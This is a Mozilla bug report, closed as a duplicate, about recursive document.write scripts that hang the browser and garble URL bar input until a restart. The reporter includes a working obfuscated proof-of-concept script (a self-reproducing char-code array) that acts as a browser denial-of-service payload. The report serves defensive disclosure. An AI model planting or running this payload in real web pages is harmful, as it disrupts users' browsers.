Closed
Bug 214198
Opened 21 years ago
Closed 21 years ago
Mozilla does not detect and ignore malicious recursive document.write <script>
Categories
(Core :: DOM: Core & HTML, defect)
RESOLVED
DUPLICATE
of bug 185945
People
(Reporter: ptchristendom, Unassigned)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5a) Gecko/20030718
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5a) Gecko/20030718

Paste this script into a text file and view it in Mozilla (as HTML). Mozilla will give me an hourglass, and be sluggish. After I finally hit stop, things work almost OK except that when I type in the URL bar, the LETTERS COME OUT BACKWARDS, e.g., "moc.elgoog.www". (The arrow keys don't work either.) Mozilla must be restarted before it will work right again.

-------------------------CUT HERE-------------------------------------
<script>var c=1; var a=new Array(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,99,32,43,32,34,46,32,60,115,99,114,34,43,34,105,112,116,62,118,97,114,32,99,61,34,32,43,32,40,99,43,49,41,32,43,32,34,59,32,118,97,114,32,97,32,61,32,110,101,119,32,65,114,114,97,121,40,34,32,43,32,97,46,106,111,105,110,40,41,32,43,32,34,41,59,34,41,59,13,10,102,111,114,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,97,46,108,101,110,103,116,104,59,32,105,43,43,41,32,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,97,91,105,93,41,41,59,13,10,60,47,115,99,114,105,112,116,62);
document.write(c + ". <scr"+"ipt>var c=" + (c+1) + "; var a = new Array(" + a.join() + ");");
for(var i = 0; i < a.length; i++) document.write(String.fromCharCode(a[i]));
</script>

Reproducible: Always

Steps to Reproduce:
1. Paste the script into C:\test.html
2. Go to file:c:\test.html
3. Hit stop
4. Try to type in a new address

Actual Results:
See details

Expected Results:
Mozilla should refuse to render nested document.write scripts after a certain level deep. (IE 6.0 will print "1. 2. 3. 4. 5." and then stop)

Problem also exists in 1.4.something. 1.2.1 just crashes. This bug allows malicious web programmers or XSS vulnerabilities to annoy the browser, forcing him to restart Mozilla.
Also test for similar tricks using eval(). I have not tried this.
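The depth limit requested under Expected Results can be modelled outside a browser. The following is an added example, not part of the original report and not Gecko code: `renderWithDepthCap`, `MAX_WRITE_DEPTH` and the sample markup are hypothetical names and constructed input, and the cap of 5 is an assumption taken from the IE 6.0 output quoted in the report.

```javascript
// Added example: a small model of document.write re-entrancy, not Gecko code.
const MAX_WRITE_DEPTH = 5; // assumed cap, chosen to match the IE 6.0 output in the report

function renderWithDepthCap(html, maxDepth = MAX_WRITE_DEPTH) {
  const out = [];    // text that reaches the rendered page
  let pending = '';  // written markup that has not been parsed yet
  let depth = 0;     // scripts currently executing, one inside another
  let blocked = 0;   // scripts refused because the cap was reached
  const doc = { write(s) { pending += String(s); pump(); } };

  function pump() {
    for (;;) {
      const open = pending.indexOf('<script>');
      if (open === -1) {
        // Hold back a trailing partial "<script>" so piecewise writes still parse.
        const lt = pending.lastIndexOf('<');
        const cut = lt !== -1 && '<script>'.startsWith(pending.slice(lt)) ? lt : pending.length;
        out.push(pending.slice(0, cut));
        pending = pending.slice(cut);
        return;
      }
      const close = pending.indexOf('</script>', open);
      if (close === -1) return; // script element incomplete: wait for more writes
      out.push(pending.slice(0, open));
      const src = pending.slice(open + 8, close);
      const rest = pending.slice(close + 9);
      pending = ''; // writes made by this script land before `rest`
      if (depth >= maxDepth) {
        blocked++; // refuse to run the script instead of recursing further
      } else {
        depth++;
        try { new Function('document', src)(doc); } finally { depth--; }
      }
      pending += rest;
    }
  }

  pending = html;
  pump();
  return { text: out.join('') + pending, blocked };
}

// Constructed sample: each script prints its number and writes its successor.
const SAMPLE = '<script>(function f(n){document.write(n+". <scr"+"ipt>("+f+")("+(n+1)+")</scr"+"ipt>")})(1)</script>';

console.log(renderWithDepthCap(SAMPLE)); // { text: '1. 2. 3. 4. 5. ', blocked: 1 }
```

The counter tracks only scripts that are executing inside one another, so a page with many sequential `document.write` scripts never approaches the cap.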
Comment 1•21 years ago
> Mozilla should refuse to render nested document.write scripts after a certain
> level deep. (IE 6.0 will print "1. 2. 3. 4. 5." and then stop)
I've certainly seen pages that have nested scripts more than 5 levels deep and
work fine with IE....
In any case, this is DOM all the way, not JS engine.
Component: JavaScript Engine → DOM Level 0
Comment 2•21 years ago
.
Assignee: rogerl → dom_bugs
Status: UNCONFIRMED → NEW
Ever confirmed: true
QA Contact: pschwartau → ashishbhatt
Comment 3•21 years ago
Duplicate of bug 185945? "Recursive document.write() prevents browser from shutting down completely"
Whiteboard: DUPEME
Reporter
Comment 4•21 years ago
*** This bug has been marked as a duplicate of 185945 ***
Status: NEW → RESOLVED
Closed: 21 years ago
Resolution: --- → DUPLICATE